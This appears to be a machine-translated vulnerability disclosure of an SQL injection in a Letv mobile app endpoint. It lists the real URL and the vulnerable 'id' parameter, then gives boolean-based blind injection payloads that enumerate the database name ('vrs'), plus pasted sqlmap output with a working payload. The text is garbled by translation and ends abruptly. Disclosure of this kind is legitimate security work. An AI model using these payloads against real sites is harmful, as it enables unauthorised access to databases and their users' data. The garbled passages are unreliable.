An SQL injection vulnerability exists in a substation of levision.
An SQL injection vulnerability exists in a substation of levision.
Http://app.m.letv.com/android/mindex.phtml? Version = 3.3.0.1 & pcode = 010110106 & mod = minfo & ctl = video & act = index & id = 80103 & vtype = m3u8
Injection parameter id
Http://app.m.letv.com/android/mindex.phtml? Version = 3.3.0.1 & pcode = 010110106 & mod = minfo & ctl = video & act = index & id = 80103 '& vtype = m3u8
Http://app.m.letv.com/android/mindex.phtml? Version = 3.3.0.1 & pcode = 010110106 & mod = minfo & ctl = video & act = index & id = 80103 'and '1' = '1 & vtype = m3u8
Http://app.m.letv.com/android/mindex.phtml? Version = 3.3.0.1 & pcode = 010110106 & mod = minfo & ctl = video & act = index & id = 80103 'and '1' = '2 & vtype = m3u8
View Current Database
Http://app.m.letv.com/android/mindex.phtml? Version = 3.3.0.1 & pcode = 010110106 & mod = minfo & ctl = video & act = index & id = 80103 'and 1 = 1 and length (select DATABASE ())) = 3 and 'A' = 'a & vtype = m3u8
Http://app.m.letv.com/android/mindex.phtml? Version = 3.3.0.1 & pcode = 010110106 & mod = minfo & ctl = video & act = index & id = 80103 'and 1 = 1 and (select DATABASE ()) = 'vrs 'and 'A' = 'a & vtype = m3u8
The current database is vrs.
Sqlmap identified the following injection points with a total of 55 HTTP (s) requ
Ests:
---
Place: URI
Parameter: #1 *
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: http://app.m.letv.com: 80/android/mindex. phtml? Version = 3.3.0.1 & pcode
= 010110106 & mod = minfo & ctl = video & act = index & id = 80103 'AND 4451 = 4451 AND 'xlvh' = 'xlv
H & vtype = m3u8
Vector: AND [INFERENCE]
---
Why use http://app.m.letv.com: 80/android/mindex. phtml? Mod = minfo & ctl = videoinfo & act = detail & id = 1940748 & pcode = 010110106 & version = 1.0.